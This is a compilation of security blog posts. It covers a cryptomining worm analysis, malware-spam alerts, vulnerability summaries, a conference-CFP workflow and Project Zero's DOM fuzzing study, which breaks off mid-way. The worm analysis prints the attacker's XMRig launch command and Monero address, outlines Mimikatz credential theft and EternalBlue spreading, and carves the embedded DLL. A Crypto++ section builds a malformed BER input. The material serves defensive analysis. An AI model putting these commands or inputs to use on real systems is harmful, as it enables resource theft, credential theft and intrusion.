In this blog post we’ve performed our initial investigation into the Wi-Fi stack on Apple’s mobile devices. Using a privileged research platform to poke around the kernel, we managed to locate the Wi-Fi firmware’s TCM mapping in the host, and to extract the Wi-Fi chip’s ROM for further analysis. We also started fleshing out our research platform within the iOS kernel, allowing us to build our very own Wi-Fi firmware debugger, as well as several modules for parsing the kernel’s structures -- useful tools for the next stage of our research!

In the next blog post, we’ll use our firmware debugger in order to continue our exploration of the Wi-Fi chip present on the iPhone 7. We’ll perform a deep dive into the firmware, discover multiple vulnerabilities and develop an over-the-air exploit for one of them, allowing us to gain full control over the Wi-Fi SoC.

QOTD – SEC Chair Clayton on Need for Cooperation

Cybersecurity must be more than a firm-by-firm or agency-by-agency effort. Active and open communication between and among regulators and the private sector also is critical to ensuring the nation’s financial system is robust and effectively protected. Information sharing and coordination are essential for regulators to anticipate potential cyber threats and respond to a major cyberattack, should one arise.
-- Jay Clayton, SEC Chair 

Src: Written Remarks before the Committee on Banking, Housing and Urban Development United States Senate, September 26, 2017

Malware spam: "Emailing: Scan0xxx" from "Sales" delivers Locky or Trickbot

This fake document scan delivers different malware depending on the victim's location:

From:       "Sales" [sales@victimdomain.tld]
Subject:       Emailing: Scan0963
Date:       Thu, September 28, 2017 10:31 am

Your message is ready to be sent with the following file or link attachments:

Scan0963

Note: To protect against computer viruses, e-mail programs may prevent sending or receiving

Enterprise Security Weekly #63 – Temporal Tempura

Paul and John discuss network security architecture. In the news, Google Cloud acquires Bitium, Ixia extends cloud visibility, Lacework now supports Microsoft Windows Server, and more on this episode of Enterprise Security Weekly! Full Show Notes:

Visit for all the latest episodes!

Hack Naked News #142 – September 26, 2017

Tracking cars, iOS 11 patches eight vulnerabilities, Equifax dumps their CEO, High Sierra gets slammed with a 0-day, and more. Jason Wood of Paladin Security discusses an email DDoS threat on this episode of Hack Naked News! Full Show Notes:

Visit for all the latest episodes!

Advanced ‘all in memory’ CryptoWorm


Today I want to share a nice Malware analysis with an interesting flow. The "interesting" adjective comes from the capabilities the given sample owns: exploitation abilities, heavy obfuscation, and the use of advanced techniques to steal credentials and run commands.

The analyzed sample was provided by a colleague of mine (Alessandro), who received the first stage by email. A special thanks to Luca and Edoardo for recognizing XMRig in the last infection stage.

General View.

The following image shows a general view of the entire attack path. As you might appreciate from the picture, the flow is fairly complex, since many specific artifacts are involved in the attack phases. The initial stage starts by abusing the user's inexperience, luring him/her into clicking on a first-stage file called (in my case) y1.bat. Nowadays, email is one of attackers' favorite delivery vectors, easily used to deliver malicious content. Once the first stage runs, it downloads and executes a second-stage file called info6.ps1: a heavily obfuscated PowerShell script which drops (by de-obfuscating them directly in its body) three internal resources:
  1. Mimikatz.dll. This module is used to steal administrative credentials.
  2. Utilities. This module is used to scan internal networks in order to propagate the infection, and to run several internal utilities such as (but not limited to) de-obfuscation routines, array-sorting helpers, and the exploits. This module is also used to drop and execute an additional file (from the same server) named info.vbs.
  3. Exploits. This module is a set of known exploits, such as eternalblue7_exploit and eternal_blue_powershell, used from the initial stage of the attack to infect internal machines.
Full Stage Attack Path

The last stage (info.vbs) drops and runs an executable file which has been recognized as XMRig. XMRig is an open-source Monero CPU miner, freely available on GitHub. The infection tries to propagate itself by scanning and attacking internal resources through the Exploits module, while the XMRig module mines Monero cryptocurrency, giving the attacker fresh "crypto money" by stealing victims' resources.


A romantic but still "working" .bat file is propagated to the victim by email or message. Once the user clicks on it, the .bat file runs the following command, spawning a PowerShell instance that downloads and runs a script called info6.ps1 from

Stage1: Downloads and Run 
The downloaded PowerShell file is clearly divided into two macro blocks, both of them obfuscated. The following image shows the two visual sections, which I will call "half up" (the section before the "new line") and "half down" (the section after the "new line").

Stage2: Two Visual Sections to be explored
While the "half up" section appears to be a Base64-encoded text file, the "half down" section looks like it was encoded with a crafted function which, fortunately, appears in clear text at the end of the file. By editing that function it is possible to modify the decoding process, making it save the decoded text file directly to a folder of choice. The following image shows the decoded second stage "half down" section.

Decoded Second Stage "Half Down"
Analyzing the section's code, it is easy to see that the main functions used are dynamically extracted from the file itself by performing substring operations on its content.




The content of the $fa variable, and every function related to it, is placed in the "half up" section, which after being decoded looks like the following image.

Decoded Second Stage "Half Up"
The second stage "half up" code is borrowed from Kevin Robertson (Irken); the attacker reused many useful functionalities from Irken, including the Invoke-TheHash routine, which can be used over SMB to execute commands or to run code with special rights.

A surprisingly interesting line of code is found in the same stage (second stage, "half down"): NTLM= Get-creds mimi mimi, where the Get-creds function (coming from the Base64-decoded "half up") runs a DLL function using the reflection technique. So by definition the mimi parameter has to be a DLL file included somewhere in the code. Let's grab it by running the following code: $fa.sUBStrInG(406494,1131864), where 406494 is the start character and 1131864 is the last character to be interpreted as a dynamically loaded library. Fortunately, the dropped DLL is a well-known library, widely used in penetration testing, named Mimikatz. It is clear that the attacker uses the Mimikatz library to grab user (and eventually administrator) passwords. Once the password-stealing activity is done, the Malware starts to scan internal networks for known vulnerabilities such as MS17-010. The identified exploits have been borrowed from tevora-threat and woravit, since the same pieces of code, the same comments, and the same variable names have been found. If the Malware finds a vulnerable machine on the local network, it tries to infect it by injecting itself (info6.ps1) through EternalBlue, and then begins its execution from the second stage.
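To make the carving step concrete, here is a hedged Python equivalent of that Substring call. It assumes, as is typical for DLLs embedded in PowerShell scripts, that the carved range is Base64-encoded, and notes that PowerShell's Substring takes a start index and a length as its two arguments; the function name and output path are illustrative:

```python
import base64

def carve_embedded_dll(script_text: str, start: int, length: int, out_path: str):
    """Mimic $fa.sUBStrInG(406494,1131864): carve the character range
    holding the embedded DLL, Base64-decode it, and write it to disk.
    (Assumption: the carved text is Base64, as is usual for PE files
    embedded in PowerShell droppers.)"""
    carved = script_text[start:start + length]   # Substring(start, length)
    dll = base64.b64decode(carved)
    assert dll[:2] == b"MZ", "not a PE file"     # DOS/PE magic check
    with open(out_path, "wb") as f:
        f.write(dll)
    return dll
```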

In the same thread, the Malware drops and runs a .vbs file (the third stage) and gains persistence through WMIClass on a service.

Introducing the Third Stage
The info.vbs drops and executes from itself a compiled version of XMRig, renamed with the "mimetic" string: taskservice.exe. Once the compiled PE file (XMRig) is in place, the new stage starts it by running the following commands.

Third Stage Execution of Monero Miner
The clear text Monero address is visible on the code. Unfortunately the Monero address is not trackable so far. 

Monero address: 46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE

and the used server is: stratum+tcp:// "%temp%\taskservice.exe  -B -o stratum+tcp:// -u  46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE  -o stratum+tcp://  -u  46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE -o stratum+tcp://   -u  46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE -p x" ,0
Many other interesting sections could be analyzed, but let's stop here for now.


Please find some of the most interesting IoCs below, for your convenience.

- URL:
- Monero Address: 46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE
- Sha256: 19e15a4288e109405f0181d921d3645e4622c87c4050004357355b7a9bf862cc
- Sha256: 038d4ef30a0bfebe3bfd48a5b6fed1b47d1e9b2ed737e8ca0447d6b1848ce309


We are facing one of the first complex deliveries of crypto-coin mining Malware. Everybody knows about CryptoMine, BitCoinMiner and Adylkuzz Malware, which basically dropped a BitCoin miner on the target machine, so if you are wondering, "Marco, why do you write 'one of the first'?", well, actually I wrote one of the first "complex" deliveries. The usual coin-mining Malware is delivered with no propagation module, no exploitation module, and no file-less techniques. In fact, the way this Monero CPU miner has been delivered includes advanced memory-inflation methodologies, where the unpacked Malware is never saved to the hard drive (a technique to bypass some antivirus products) but is instead inflated directly into memory and called directly from memory itself.

We can consider this Malware a latest-generation, "all in memory" CryptoWorm.

Another interesting observation, at least from my personal point of view, comes from the first stage. Why did the attacker include this seemingly useless stage? It appears not to be useful at all; it's a mere dropper with no controls nor evasions. The attacker could have delivered just the second stage directly, assuring a stealthier network fingerprint. So why did the attacker decide to deliver the CryptoWorm through the first stage? Maybe the first stage is part of a bigger framework? Are we facing a new generation of Malware generator kits?

I won't answer such questions right now; on the contrary, I'd like to leave my readers thinking about them.

Have fun

Cryptopp Crypto++ 5.6.4 octets Remote Code Execution Vulnerability

Crypto++ (aka cryptopp and libcrypto++) 5.6.4 contained a bug in its ASN.1 BER decoding routine. The library will allocate a memory block based on the length field of the ASN.1 object. If there are not enough content octets in the ASN.1 object, then the function will fail and the memory block will be zeroed even if it is unused. There is a noticeable delay during the wipe for a large allocation.
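To illustrate the shape of input involved, here is a small hedged sketch that builds a BER tag-length header claiming far more content octets than it actually supplies, which is the pattern that makes a length-driven allocator over-allocate:

```python
def ber_header(tag: int, length: int) -> bytes:
    """Build a BER tag-length header. Short form encodes the length in
    one byte; long form (length > 127) uses 0x80 | n followed by n
    big-endian length octets."""
    if length < 0x80:
        return bytes([tag, length])
    len_bytes = length.to_bytes((length.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(len_bytes)]) + len_bytes

# A SEQUENCE (tag 0x30) header claiming ~2 GB of content octets while
# carrying none: a decoder that allocates up front based on this field
# would attempt (and later wipe) a huge allocation.
evil = ber_header(0x30, 0x7FFFFFFF)
```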

Phpipam 1.2 Execute Code Cross Site Scripting Vulnerability

Multiple Cross-Site Scripting (XSS) issues were discovered in phpipam 1.2. The vulnerabilities exist due to insufficient filtration of user-supplied data passed to several pages (instructions in app/admin/instructions/preview.php; subnetId in app/admin/powerDNS/refresh-ptr-records.php). An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website.

QOTD – SEC Chair Clayton on Cyber Risk Disclosures

[W]e are continuing to examine whether public companies are taking appropriate action to inform investors, including after a breach has occurred, and we will investigate issuers that mislead investors about material cybersecurity risks or data breaches.
-- Jay Clayton, SEC Chair 

Src: Written Remarks before the Committee on Banking, Housing and Urban Development United States Senate, September 26, 2017

Malware spam: "AutoPosted PI Notifier"

This spam has a .7z file leading to Locky ransomware.

From:      "AutoPosted PI Notifier" [NoReplyMailbox@redacted.tld]
Subject:      Invoice PIS9344608
Date:      Tue, September 26, 2017 5:29 pm

Please find Invoice PIS9344608 attached.

The number referenced in the spam varies, but attached is a .7z archive file with a matching filename. In turn, this contains one of a number of malicious VBS

“Preparing for Cyber Security Incidents”

This blog post was written by ICS515 instructor, Kai Thomsen. Talk with any incident responder and you'll learn that there are a few less glamorous parts of the job. Writing the final report and preparation in advance of an incident are probably top contenders. In this article I want to focus on preparation and explain to … Continue reading Preparing for Cyber Security Incidents

Hyperbole in Breach Reporting

While reading the news this morning about yet another successful data breach, I couldn't help but wonder if the hyperbole used in reporting about data breaches is stifling our ability to educate key stakeholders on what they really need to know.

Today's example is about a firm that many rely on for security strategy, planning, and execution. The article I read stated that they were "targeted by a sophisticated hack" but later explains that the attacker compromised a privileged account that provided unrestricted "access to all areas". And, according to sources, the account only required a basic password with no two-step or multi-factor authentication. That doesn't sound too sophisticated, does it? Maybe they brute-forced it, or maybe they just guessed the password (or found it written down in an office?)

It reminded me of an attack on a security vendor back in 2011. As I recall, there was a lot of talk of the sophistication and complexity of the attack. It was called an Advanced Persistent Threat (and maybe some aspects of it were advanced). But, when the facts came out, an employee simply opened an email attachment that introduced malware into the environment - again, not overly sophisticated in terms of what we think a hack to be.

The quantity, availability, and effectiveness of attack techniques are enough to make anyone uncomfortable with their security posture. I previously wrote about a German company who, in a breach response, wrote that it is "virtually impossible to provide viable protection against organized, highly professional hacking attacks." CISOs are being told that they should expect to be breached. The only questions are about when and how to respond. It makes you feel like there's no hope; like there's no point in trying.

However, if you look at the two examples above that were described as highly sophisticated, they may have been avoided with simple techniques such as employee education, malware detection, and multi-factor authentication. I don't mean to over-simplify. I'm not saying it's all easy or that these companies are at-fault or negligent. I'm just calling for less hyperbole in the reporting. Call out the techniques that help companies avoid similar attacks. Don't describe an attack as overly sophisticated if it's not. It makes people feel even more helpless when, perhaps, there are some simple steps that can be taken to reduce the attack surface.

I'd also advocate for more transparency from those who are attacked. Companies shouldn't feel like they have to make things sound more complicated or sophisticated than they are. There's now a growing history of reputable companies (including in the security industry) who have been breached. If you're breached, you're in good company. Let's talk in simple terms about the attacks that happen in the real world. An "open kimono" approach will be more effective at educating others in prevention. And again, less hyperbole - we don't need to overplay to emotion here. Everyone is scared enough. We know the harsh reality of what we (as security professionals) are facing. So, let's strive to better understand the real attack surface and how to prioritize our efforts to reduce the likelihood of a breach.

QOTD – Raskin on Cybersecurity as Shared Responsibility

Understanding and dealing with the cyber threat has, due to your efforts, seeped from the IT shop and into the CEO shop.  Responsibility is now shared. In fact, this new shared responsibility, among IT experts, the CEO, and the board of directors, has been the most noticeable trend in governance from my time in the industry, in state government, and in the federal government.  Bankers rarely used to talk to me much about cybersecurity.  Now, this is one topic that comes up every day.
-- Treasury Deputy Secretary Sarah Bloom Raskin

Src: Remarks of Deputy Secretary Raskin at The Texas Bankers’ Association Executive Leadership Cybersecurity Conference

The Hay CFP Management Method

By Andrew Hay, Co-Founder and CTO, LEO Cyber Security.

I speak at a lot of conferences around the world. As a result, people often ask me how I manage the vast number of abstracts and security call for papers (CFPs) submissions. So I thought I’d create a blog post to explain my process. For lack of a better name, let’s call it the Hay CFP Management Method. It should be noted that this method could be applied to any number of things from blog posts to white papers and scholastic articles to news stories. I have successfully proven this methodology for both myself and my teams at OpenDNS, DataGravity, and LEO Cyber Security. Staying organized helped manage the deluge of events, submitted talks, and important due dates in addition to helping me keep track of where in the world my team was and what they were talking about.

I, like most people, started managing abstracts and submissions by relying on email searches and documents (both local and on Google Drive, Dropbox, etc.). Unfortunately, I didn’t find this scaled very well as I kept losing track of submitted vs. accepted/rejected talks and their corresponding dates. It certainly didn’t scale when it was applied to an entire team as opposed to a single individual.

Enter Trello, a popular (and freemium) web-based project management application that utilizes the Kanban methodology for organizing projects (boards), lists (task lists), and tasks (cards). In late September I start by creating a board for the upcoming year (let’s call this board the 2018 Conference CFP Calendar) and, if not already created, a board to track my abstracts in their development lifecycle (let’s call this board Talk Abstracts).

Within the Talk Abstracts board, I create several lists to act as swim lanes for my conference abstracts and other useful information. These lists are:

* Development: These are talks that are actively being developed and are not yet ready for prime time.
* Completed: These are talks that have finished development and are ready to be delivered at an upcoming event.
* Delivered: These are talks that have been delivered at least once.
* Misc: This list is where I keep my frequently requested form information such as my short bio (less than 50 characters), long bio (less than 1,500 characters), business mailing address (instead of browsing to your corporate website every time), and CISSP number (because who can remember that?).
* Retired: As a personal rule, I only use a particular talk for one calendar year. When I feel as though the talk is stale, boring, or stops being accepted, I move the card to this list. That’s not to say you can’t revive a talk or topic in the future as a “version 2.0”. This is why keeping the card around is valuable.

Within the 2018 Conference CFP Calendar board, I create several lists to act as swim lanes for my various CFPs. These lists are:

* CFP open: This is where I put all of the upcoming conference cards that I know about even if I do not yet know the exact details (such as location, CFP open/close, etc.).
* CFP closes in < 30 days: This is where I put the upcoming conference cards that have a confirmed closing date within the next 30 days. Note, it is very important to record details in the cards such as closing date, conference CFP mechanism (e.g. email vs. web form), and any related URLs for the event.
* Submitted: These are the conferences that I have submitted to and the associated cards. Note, I always provide a link to the abstract I submitted as a way to remind myself what I’m talking about.
* Accepted: These are the accepted talk cards. Note, I always put a copy of the email (or link to) acceptance notification to record any details that might be important down the road. I also make sure to change the date on the card to that of the speaking date and time slot to help keep me organized.
* Attending but not presenting: This is really a generic catch-all for events that I need to be at but may not be speaking at (e.g. booth duty, attending training, etc.). The card and associated dates help keep my dance card organized.
* Accepted but backed out: Sometimes life happens. This list contains cards of conference submissions that I had to back out of for one reason or another. I keep these cards in their own column to show me what was successfully accepted and might be a fit for next year in addition to the reason I had to back out (e.g. conflict, personal issue, alien abduction, etc.).
* Completed: This list is for completed talk cards. Again, I keep these to reference for next year’s board as it provides some ballpark dates for when the CFP opens, closes, as well as the venue and conference date.
* Rejected: They’re not all winners and not everybody gets every talk accepted. In my opinion, keeping track of your rejected talks is as (if not more) important as keeping track of your accepted talks. Not only does it allow you to see what didn’t work for that particular event, but it also allows you to record reviewer feedback on the submission and maybe submit a different style or type of abstract in the future.
* Not doing 2018: This is the list where I put conference cards that I’ve missed the deadline on (hey, it happens), cannot submit to because of a conflict, or simply choose to not submit a talk to.

It should be noted that I keep the above lists in the same order every year to help minimize my development time against the Trello API for my visualization dashboard (which I will explain in a future blog post). This might sound like a lot of work but once you’ve set this board up you can reuse it every year. In fact, it’s much easier to copy last year’s board than starting fresh every year, as it brings the cards and details over. Then all you need to do is update the old cards with the new venue, dates, and URLs.
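As an illustration of why the fixed list order pays off, the board structure can be modeled in a few lines of Python. This is a toy model of the workflow, not the Trello API; the class and field names are my own:

```python
from dataclasses import dataclass, field

@dataclass
class Card:
    name: str
    details: dict = field(default_factory=dict)  # dates, URLs, feedback

@dataclass
class Board:
    name: str
    lists: dict = field(default_factory=dict)    # list name -> [Card]

    def add_list(self, list_name: str):
        self.lists[list_name] = []

    def add_card(self, list_name: str, card: Card):
        self.lists[list_name].append(card)

    def move_card(self, card: Card, src: str, dst: str):
        self.lists[src].remove(card)
        self.lists[dst].append(card)

# Keeping the same swim lanes, in the same order, every year means any
# tooling written against the board (e.g. a dashboard) keeps working.
LANES = ["CFP open", "CFP closes in < 30 days", "Submitted", "Accepted",
         "Attending but not presenting", "Accepted but backed out",
         "Completed", "Rejected", "Not doing 2018"]
```

A card then moves through the pipeline with `move_card`, e.g. from "Submitted" to "Accepted" when the notification arrives.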

Now that we have our board structure created we need to start populating the lists with the cards – which I’ll explain in the next blog post. In addition to the card blog post, I’ll explain two other components of the process in subsequent posts. For reference, here are the upcoming blog posts that will build on this one:

* Individual cards and their structure
* Moving cards through the pipeline
* Visualizing your board (and why it helps)

The post The Hay CFP Management Method appeared first on LEO Cyber Security.

Startup Security Weekly #56 – A Huge Week

Don Pezet and Tim Broom of ITProTV join us. In the news, building successful products, the most important startup question, and updates from McAfee, Slack, ThreatStack, and more on this episode of Startup Security Weekly!Full Show Notes: for all the latest episodes!

QOTD – Admiral Rogers on Cyber War

Cyber war is not some future concept or cinematic spectacle, it is real and here to stay.
Conflict in the cyber domain is not simply a continuation of kinetic operations by digital means, nor is it some Science Fiction clash of robot armies.

-- Admiral Michael Rogers, Commander of US Cyber Command,
Testimony before US House Committee on Armed Service (May 2017)

Src: Docs.House.Gov

A Change In Context

Today marks the end of my first week in a new job. As of this past Monday, I am now a Manager, Security Engineering, with Pearson. I'll be handling a variety of responsibilities, initially mixed between security architecture and team management. I view this opportunity as a chance to reset my career after the myriad challenges experienced over the past decade. In particular, I will now finally be able to say I've had administrative responsibility for personnel, the lack of which has held me back from career progression these past few years.

This change is a welcome one, and it will also be momentous in that it will see us leaving the NoVA/DC area next Summer. The destination is not finalized, but it seems likely to be Denver. While it's not the same as being in Montana, it's the Rockies and at elevation, which sounds good to me. Not to mention I know several people in the area and, in general, like it. Which is not to say that we dislike where we live today (despite the high price tag). It's just time for a change of scenery.

I plan to continue writing on the side here (and on LinkedIn), but the pace of writing may slow again in the short-term while I dedicate most of my energy to ramping up the day job. The good news, however, is this will afford me the opportunity to continue getting "real world" experience that can be translated and related in a hopefully meaningful manner.

Until next time, thanks and good luck!

The Great DOM Fuzz-off of 2017

Posted by Ivan Fratric, Project Zero


Historically, DOM engines have been one of the largest sources of web browser bugs. And while in the recent years the popularity of those kinds of bugs in targeted attacks has somewhat fallen in favor of Flash (which allows for cross-browser exploits) and JavaScript engine bugs (which often result in very powerful exploitation primitives), they are far from gone. For example, CVE-2016-9079 (a bug that was used in November 2016 against Tor Browser users) was a bug in Firefox’s DOM implementation, specifically the part that handles SVG elements in a web page. It is also a rare case that a vendor will publish a security update that doesn’t contain fixes for at least several DOM engine bugs.

An interesting property of many of those bugs is that they are more or less easy to find by fuzzing. This is why a lot of security researchers, as well as browser vendors who care about security, invest in building DOM fuzzers and associated infrastructure.

As a result, after joining Project Zero, one of my first projects was to test the current state of resilience of major web browsers against DOM fuzzing.

The fuzzer

For this project I wanted to write a new fuzzer which takes some of the ideas from my previous DOM fuzzing projects, but also improves on them and implements new features. Starting from scratch also allowed me to end up with cleaner code that I’m open-sourcing together with this blog post. The goal was not to create anything groundbreaking - as already noted by security researchers, many DOM fuzzers have begun to look like each other over time. Instead the goal was to create a fuzzer that has decent initial coverage, is easily understandable and extendible and can be reused by myself as well as other researchers for fuzzing other targets besides just DOM fuzzing.

We named this new fuzzer Domato (credits to Tavis for suggesting the name). Like most DOM fuzzers, Domato is generative, meaning that the fuzzer generates a sample from scratch given a set of grammars that describes HTML/CSS structure as well as various JavaScript objects, properties and functions.

The fuzzer consists of several parts:
  • The base engine that can generate a sample given an input grammar. This part is intentionally fairly generic and can be applied to other problems besides just DOM fuzzing.
  • The main script that parses the arguments and uses the base engine to create samples. Most logic that is DOM specific is captured in this part.
  • A set of grammars for generating HTML, CSS and JavaScript code.
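As a toy illustration of the generative approach the base engine implements (this is not Domato's actual grammar syntax), a recursive expander over a symbol table captures the core idea: each `{symbol}` token is replaced by a randomly chosen production until only literal output remains.

```python
import random
import re

# Toy grammar: {symbol} tokens expand recursively; all else is literal.
GRAMMAR = {
    "html": ["<div {attr}>{html}</div>", "<span {attr}>{html}</span>", "text"],
    "attr": ['id="a"', 'class="b"', "contenteditable"],
}

def generate(symbol: str, depth: int = 0, max_depth: int = 8) -> str:
    """Expand `symbol` by choosing a random production and recursively
    expanding any {token} references, bounding the recursion depth."""
    if depth > max_depth:
        return "text"                       # cut off runaway recursion
    production = random.choice(GRAMMAR[symbol])
    return re.sub(r"\{(\w+)\}",
                  lambda m: generate(m.group(1), depth + 1, max_depth),
                  production)
```

A real DOM fuzzer layers much more on top (stateful JavaScript generation, callbacks, weighted productions), but the expansion loop is the same in spirit.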

One of the most difficult aspects in the generation-based fuzzing is creating a grammar or another structure that describes the samples that are going to be created. In the past I experimented with manually created grammars as well as grammars extracted automatically from web browser code. Each of these approaches has advantages and drawbacks, so for this fuzzer I decided to use a hybrid approach:

  1. I initially extracted DOM API declarations from .idl files in Google Chrome Source. Similarly, I parsed Chrome’s layout tests to extract common (and not so common) names and values of various HTML and CSS properties.
  2. Afterwards, this automatically extracted data was heavily manually edited to make the generated samples more likely to trigger interesting behavior. One example of this are functions and properties that take strings as input: Just because a DOM property takes a string as an input does not mean that any string would have a meaning in the context of that property.

Beyond that, Domato supports the features you’d expect from a DOM fuzzer, such as:
  • Generating multiple JavaScript functions that can be used as targets for various DOM callbacks and event handlers
  • Implicit (through grammar definitions) support for “interesting” APIs (e.g. the Range API) that have historically been prone to bugs.

Instead of going into much technical detail here, the reader is referred to the fuzzer code and documentation. It is my hope that by open-sourcing the fuzzer I will invite community contributions that cover the areas I might have missed in the fuzzer or grammar creation.


We tested 5 browsers with the highest market share: Google Chrome, Mozilla Firefox, Internet Explorer, Microsoft Edge and Apple Safari. We gave each browser approximately 100,000,000 iterations with the fuzzer and recorded the crashes. (If we fuzzed some browsers for longer than 100,000,000 iterations, only the bugs found within this number of iterations were counted in the results.) Running this number of iterations would take too long on a single machine and thus requires fuzzing at scale, but it is still well within the budget of a determined attacker. For reference, it can be done for about $1k on Google Compute Engine given the smallest possible VM size, preemptible VMs (which I think work well for fuzzing jobs, as they don’t need to be up all the time) and 10 seconds per run.
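That cost estimate can be sanity-checked with some quick arithmetic. The per-VM-hour price below is my assumption (roughly the 2017 preemptible price of the smallest GCE instance type); actual pricing varies:

```python
# Back-of-the-envelope check of the fuzzing cost estimate.
iterations = 100_000_000        # fuzzing iterations per browser
seconds_per_run = 10            # per-sample runtime, as stated above
vm_hours = iterations * seconds_per_run / 3600.0   # one sample per VM at a time
price_per_vm_hour = 0.0035      # assumed preemptible rate in USD (varies)
cost_usd = vm_hours * price_per_vm_hour
print(f"{vm_hours:,.0f} VM-hours, ~${cost_usd:,.0f}")  # → 277,778 VM-hours, ~$972
```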

Here are additional details of the fuzzing setup for each browser:

  • Google Chrome was fuzzed on an internal Chrome Security fuzzing cluster called ClusterFuzz. To fuzz Google Chrome on ClusterFuzz we simply needed to upload the fuzzer and it was run automatically against various Chrome builds.

  • Mozilla Firefox was fuzzed on internal Google infrastructure (Linux-based). Since Mozilla already offers Firefox ASAN builds for download, we used those as the fuzzing target. Each crash was additionally verified against a release build.

  • Internet Explorer 11 was fuzzed on Google Compute Engine running Windows Server 2012 R2 64-bit. Given the lack of an ASAN build, page heap was applied to the iexplore.exe process to make it easier to catch some types of issues.

  • Microsoft Edge was the only browser we couldn’t easily fuzz on Google infrastructure, since Google Compute Engine doesn’t support Windows 10 at this time and Windows Server 2016 does not include Microsoft Edge. That’s why, to fuzz it, we created a virtual cluster of Windows 10 VMs on Microsoft Azure. As with Internet Explorer, page heap was applied to the MicrosoftEdgeCP.exe process before fuzzing.

  • Instead of fuzzing Safari directly, which would require Apple hardware, we instead used WebKitGTK+ which we could run on internal (Linux-based) infrastructure. We created an ASAN build of the release version of WebKitGTK+. Additionally, each crash was verified against a nightly ASAN WebKit build running on a Mac.


Without further ado, the number of security bugs found in each browser is captured in the table below.

Only security bugs were counted in the results (doing anything else is tricky, as some browser vendors fix non-security crashes while some don’t) and only bugs affecting the currently released version of the browser at the time of fuzzing were counted (as we don’t know whether bugs in the development version would be caught by internal review and fuzzing processes before release).

Browser              Number of Bugs    Project Zero Bug IDs
Google Chrome        2                 994, 1024
Mozilla Firefox      4**               1130, 1155, 1160, 1185
Internet Explorer    4                 1011, 1076, 1118, 1233
Microsoft Edge       6                 1011, 1254, 1255, 1264, 1301, 1309
Apple Safari         17                999, 1038, 1044, 1080, 1082, 1087, 1090, 1097, 1105, 1114, 1241, 1242, 1243, 1244, 1246, 1249, 1250
Total                31*

*While adding the number of bugs results in 33, 2 of the bugs affected multiple browsers
**The root cause of one of the bugs found in Mozilla Firefox was in the Skia graphics library and not in Mozilla source. However, since the relevant code was contributed by Mozilla engineers, I consider it fair to count it here.

All of the bugs listed here have been fixed in the current shipping versions of the browsers. As can be seen in the table, most browsers did relatively well in the experiment, with only a couple of security-relevant crashes found. Since the same methodology resulted in a significantly higher number of issues just several years ago, this shows clear progress for most of the web browsers. For most of the browsers the differences are not sufficiently statistically significant to justify saying that one browser’s DOM engine is better or worse than another.

However, Apple Safari is a clear outlier in the experiment, with a significantly higher number of bugs found. This is especially worrying given attackers’ interest in the platform, as evidenced by exploit prices and recent targeted attacks. It is also interesting to compare Safari’s results to Chrome’s, as until a couple of years ago they used the same DOM engine (WebKit). It appears that after the Blink/WebKit split, either the number of bugs in Blink got significantly reduced or a significant number of bugs got introduced in the new WebKit code (or both). To attempt to address this discrepancy, I reached out to Apple Security proposing to share the tools and methodology. When one of the Project Zero members decided to transfer to Apple, he contacted me and asked if the offer was still valid. So Apple received a copy of the fuzzer and will hopefully use it to improve WebKit.

It is also interesting to observe the effect of MemGC, a use-after-free mitigation in Internet Explorer and Microsoft Edge. When this mitigation is disabled using the registry flag OverrideMemoryProtectionSetting, a lot more bugs appear. However, Microsoft considers these bugs strongly mitigated by MemGC and I agree with that assessment. Given that IE used to be plagued with use-after-free issues, MemGC is an example of a useful mitigation that results in a clear positive real-world impact. Kudos to Microsoft’s team behind it!

When interpreting the results, it is very important to note that they don’t necessarily reflect the security of the whole browser and instead focus on just a single component (the DOM engine), but one that has historically been a source of many security issues. This experiment does not take into account other aspects such as the presence and security of a sandbox, bugs in other components such as scripting engines, etc. I also can’t disregard the possibility that, within DOM, my fuzzer is more capable of finding certain types of issues than others, which might have an effect on the overall stats.

Experimenting with coverage-guided DOM fuzzing

Since coverage-guided fuzzing seems to produce very good results in other areas, we wanted to combine it with DOM fuzzing. We built an experimental coverage-guided DOM fuzzer and ran it against Internet Explorer. IE was selected as a target both because of the author’s familiarity with it and because it is very easy to limit coverage collection to just the DOM component (mshtml.dll). The experimental fuzzer used a modified Domato engine to generate mutations and a modified version of WinAFL’s DynamoRIO client to measure coverage. The fuzzing flow worked roughly as follows:

  1. The fuzzer generates a new set of samples by mutating existing samples in the corpus.
  2. The fuzzer spawns IE process which opens a harness HTML page.
  3. The harness HTML page instructs the fuzzer to start measuring coverage and loads one of the samples in an iframe.
  4. After the sample executes, it notifies the harness which notifies the fuzzer to stop collecting coverage.
  5. Coverage map is examined and if it contains unseen coverage, the corresponding sample is added to the corpus.
  6. Go to step 3 until all samples are executed or the IE process crashes.
  7. Periodically minimize the corpus using the AFL’s cmin algorithm.
  8. Go to step 1.
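In simplified form, with the browser, harness and coverage instrumentation replaced by trivial stand-ins (mutate and run_and_collect_coverage below are hypothetical placeholders, and the periodic corpus minimization of step 7 is omitted), the loop above could be sketched as:

```python
import random

def mutate(sample):
    # Stand-in for the Domato-based mutation engine.
    return sample + random.choice(["<b>", "<i>", "<u>"])

def run_and_collect_coverage(sample):
    # Stand-in for running IE on the sample under DynamoRIO and reading the
    # coverage map; here "coverage" is just the set of distinct tag fragments.
    return set(sample.split("<"))

def fuzz(seed_corpus, rounds=100):
    corpus = list(seed_corpus)
    seen = set()
    for s in corpus:
        seen |= run_and_collect_coverage(s)
    for _ in range(rounds):
        batch = [mutate(random.choice(corpus)) for _ in range(10)]  # step 1
        for sample in batch:                                        # steps 2-4
            cov = run_and_collect_coverage(sample)
            if cov - seen:               # step 5: unseen coverage -> keep it
                seen |= cov
                corpus.append(sample)
    return corpus

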